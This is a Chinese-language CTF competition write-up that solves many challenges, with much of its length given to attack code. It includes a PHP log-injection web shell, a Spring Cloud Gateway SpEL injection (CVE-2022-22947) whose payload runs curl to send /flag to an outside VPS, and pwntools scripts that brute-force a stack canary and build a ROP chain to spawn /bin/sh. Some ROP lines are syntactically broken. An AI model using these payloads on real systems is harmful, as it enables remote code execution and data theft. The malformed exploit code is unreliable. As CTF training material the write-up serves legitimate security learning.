两天时间题量还挺大的,简单记录
就是做了个pythonshell的接口,直接打印即可
起初想的jail逃逸,但逃不了一点,测试发现限制了输入长度,使用_拼接进行打印
a.png为横坐标,k.png为纵坐标,题目.png为对应图片的位置信息
import matplotlib.pyplot as plt
# 坐标数据
x = [1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4,
4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8,
8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 10, 10, 12, 12, 12, 12, 13, 13, 13, 13, 13, 13,
13, 13, 13, 13, 13, 13, 13, 13, 14, 14, 14, 14, 14, 14, 14, 14, 15, 15, 15, 15, 15,
15, 15, 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 17, 17, 17, 17, 18, 18, 18,
18, 18, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 19, 20, 20,
22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 22, 23, 23, 23, 23, 23, 23, 23, 23, 23,
23, 23, 23, 23, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 25, 25, 25, 25, 25, 25, 25,
25, 25, 25, 25, 26, 26, 26, 26, 26, 26, 26, 26, 26, 26, 27, 27, 27, 27, 27, 27, 27,
27, 27, 27, 27, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 28, 29, 29, 29, 29,
29, 31, 31, 31, 31, 31, 31, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32, 32,
32, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 34, 34, 34, 34, 34, 34, 34, 34, 34,
35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 35, 36, 36, 36, 36, 36, 36, 36, 37, 37, 37,
37, 37, 37, 37, 37, 37, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38, 38,
38, 38, 39, 39, 39]
y = [4, 5, 10, 30, 3, 4, 5, 6, 10, 29, 30, 3, 4, 10, 16, 17, 22, 23, 24, 25,
29, 30, 2, 3, 4, 5, 10, 15, 16, 18, 21, 22, 24, 25, 29, 30, 3, 4, 10, 15, 17, 18,
19, 21, 22, 25, 28, 29, 3, 4, 10, 15, 16, 18, 19, 21, 22, 25, 29, 3, 4, 10, 11, 12,
13, 15, 18, 19, 22, 23, 24, 25, 29, 30, 3, 4, 11, 12, 15, 16, 17, 18, 19, 20, 25,
29, 30, 21, 22, 24, 25, 30, 31, 23, 24, 22, 23, 24, 25, 2, 3, 4, 5, 9, 10, 11, 12,
16, 17, 18, 19, 24, 25, 2, 5, 6, 9, 12, 19, 23, 24, 5, 9, 12, 18, 19, 22, 23, 4, 5,
9, 12, 17, 18, 23, 24, 3, 4, 9, 12, 16, 17, 24, 25, 3, 9, 12, 16, 25, 3, 4, 5, 6, 9,
10, 11, 12, 16, 17, 18, 19, 21, 22, 23, 24, 25, 10, 11, 3, 4, 5, 6, 10, 11, 12, 17,
18, 19, 24, 25, 3, 6, 7, 9, 10, 16, 17, 19, 20, 22, 23, 24, 25, 3, 6, 7, 9, 10, 16,
19, 20, 24, 25, 3, 6, 7, 10, 11, 12, 16, 19, 20, 24, 25, 3, 6, 7, 12, 13, 16, 19,
20, 24, 25, 3, 6, 7, 9, 12, 13, 16, 19, 20, 24, 25, 3, 4, 6, 9, 10, 11, 12, 16, 17,
19, 20, 24, 25, 4, 5, 17, 18, 19, 10, 11, 12, 13, 25, 31, 4, 5, 6, 10, 11, 12, 13,
17, 18, 19, 23, 24, 25, 26, 32, 3, 4, 6, 7, 12, 16, 17, 23, 24, 26, 32, 6, 7, 11,
16, 17, 23, 24, 26, 32, 6, 11, 12, 17, 18, 19, 23, 24, 25, 26, 33, 5, 12, 13, 19,
20, 26, 32, 4, 5, 13, 16, 19, 20, 25, 26, 32, 4, 5, 6, 7, 9, 10, 11, 12, 13, 16, 17,
18, 19, 24, 25, 31, 32, 23, 24, 31]
# 绘制散点图
plt.scatter(x, y)
# 添加标签和标题
plt.xlabel('a')
plt.ylabel('k')
plt.title('cnmd')
# 显示图形
plt.show()
追tcp流,解箭头所指的base32
送分,做问卷即可
网上有相关文章,照着基本可以打通
参考:https://blog.csdn.net/justruofeng/article/details/122108924
先传feng1再传feng2,即可getshell在根目录下读取flag
通过将错误输出到log/11.php中,正好将=phpinfo()?>
进行解析得到flag
?db=ctf&table_2_dump=\%3C\?\=phpinfo\(\)?\%3E%202%3E%20log/11.php
后访问即可
/log/11.php
CVE-2022-22947,只不过改了些配置
先添加用户
POST /nacos/v1/auth/users HTTP/1.1
Host: 39.107.137.13:30869
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=demo&password=demo
根据源码的配置文件进行gateway的配置
spring:
cloud:
nacos:
discovery:
server-addr: 127.0.0.1:8888
config:
name: backcfg
file-extension: json
group: DEFAULT_GROUP
server-addr: 127.0.0.1:8888
配置文件内容
{
"spring": {
"cloud": {
"gateway": {
"routes": [
{
"id": "exam",
"order": 0,
"uri": "lb://backendservice",
"predicates": [
"Path=/echo/**"
],
"filters": [
{
"name": "AddResponseHeader",
"args": {
"name": "result",
"value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{'curl','xxx.xxx.xxx.xxx:9999','-F','echo=@/flag'}).getInputStream())).replaceAll('\\n','').replaceAll('\\r','')}"
}
}
]
}
]
}
}
}
}
发布,然后访问/echo/123
在vps上收到flag
xml文件是一个snap可视化编程的配置文件
https://snap.berkeley.edu/snap/snap.html
导入xml文件后,可以看到以下信息
他的判断逻辑就是通过将输入的字符串按顺序前后两位进行异或后,放进test列表,然后和secret列表进行比对,如果正确,他就会输出well done
所以这里只要对secret的列表进行反向异或就行
这里在1插进值指的是在顺序1上插入,而不是使用0作为列表的开头
然后写脚本进行反向异或
$secret=[102,10,13,6,28,74,3,1,3,7,85,0,4,75,20,92,92,8,28,25,81,83,7,28,76,88,9,0,29,73,0,86,4,87,87,82,84,85,4,85,87,30];
$list=[];
//print_r(count($secret));
for($i=0;$i<=42;$i++){
$secret[$i]=$secret[$i]^$secret[$i-1];
// print_r($list);
print_r($secret);
}
//var_dump($list);
//print_r($list);
for($i=0;$i<count($secret);$i++){
if($secret[$i]>32) {
echo chr($secret[$i]);
}
}
得到flag
# coding=utf-8
from pwn import *
context.log_level='debug'
context(os='linux',arch='amd64',terminal=['alacritty','-e','sh','-c'])
io=remote('',)
elf=ELF('./funcanary')
s=lambda x:io.send(x)
sa=lambda x,y:io.sendafter(x,y)
sl=lambda x:io.sendline(x)
sla=lambda x,y:io.sendlineafter(x,y)
r=lambda x:io.recv(x)
ru=lambda x:io.recvuntil(x)
debug=lambda x:gdb.attach(io,gdbscript=x)
canary=b'\0'
ru('welcome')
for j in range(7):
for i in range(0x100):
s(b'a'*0x68+canary+chr(i))
recv=ru('welcome')
if b'fun' in recv:
canary+=chr(i)
break
for i in range(0x10):
s(b'a'*0x68+canary+p64(0xdeadbeef)+b'\x28'+chr(i*0x10+2))
recv=ru('welcome')
if b'flag{' in recv:
break
io.interactive()
# coding=utf-8
from pwn import *
context.log_level='debug'
context(os='linux',arch='amd64',terminal=['alacritty','-e','sh','-c'])
io=remote('39.105.26.155',40225)
elf=ELF('./shaokao')
libc_file=''
s=lambda x:io.send(x)
sa=lambda x,y:io.sendafter(x,y)
sl=lambda x:io.sendline(x)
sla=lambda x,y:io.sendlineafter(x,y)
r=lambda x:io.recv(x)
ru=lambda x:io.recvuntil(x)
debug=lambda x:gdb.attach(io,gdbscript=x)
choose=lambda x:sla('> ',str(x))
def pijiu(ty,size):
choose(1)
sla('3. 勇闯天涯',str(ty))
sla('来几瓶?',str(size))
def kaochuan(ty,size):
choose(2)
sla('3. 鸡肉串',str(ty))
sla('来几串?',str(size))
def yue():
choose(3)
def vip():
choose(4)
def gaime(name):
choose(5)
sla('烧烤摊儿已归你所有,请赐名:',name)
from struct import pack
p = b''
p += pack(b', 0x000000000040a67e) # pop rsi ; ret
p += pack(b', 0x00000000004e60e0) # @ .data
p += pack(b', 0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += pack(b', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack(b', 0x000000000040a67e) # pop rsi ; ret
p += pack(b', 0x00000000004e60e8) # @ .data + 8
p += pack(b', 0x0000000000447339) # xor rax, rax ; ret
p += pack(b', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += pack(b', 0x000000000040264f) # pop rdi ; ret
p += pack(b', 0x00000000004e60e0) # @ .data
p += pack(b', 0x000000000040a67e) # pop rsi ; ret
p += pack(b', 0x00000000004e60e8) # @ .data + 8
p += pack(b', 0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += pack(b', 0x00000000004e60e8) # @ .data + 8
p += pack(b', 0x4141414141414141) # padding
p += pack(b', 0x0000000000447339) # xor rax, rax ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000496710) # add rax, 1 ; ret
p += pack(b', 0x0000000000402404) # syscall
pijiu(1,-200000)
vip()
payload=b'a'*0x20+p64(0xdeadbeef)+p
gaime(payload)
io.interactive()
照着文档复现就完事了
非预期了,直接读
find / –type f |xargs grep -ra "flag{" grep
就是换表base64,很明显可以看出表是套了一层url编码,解完码直接嗦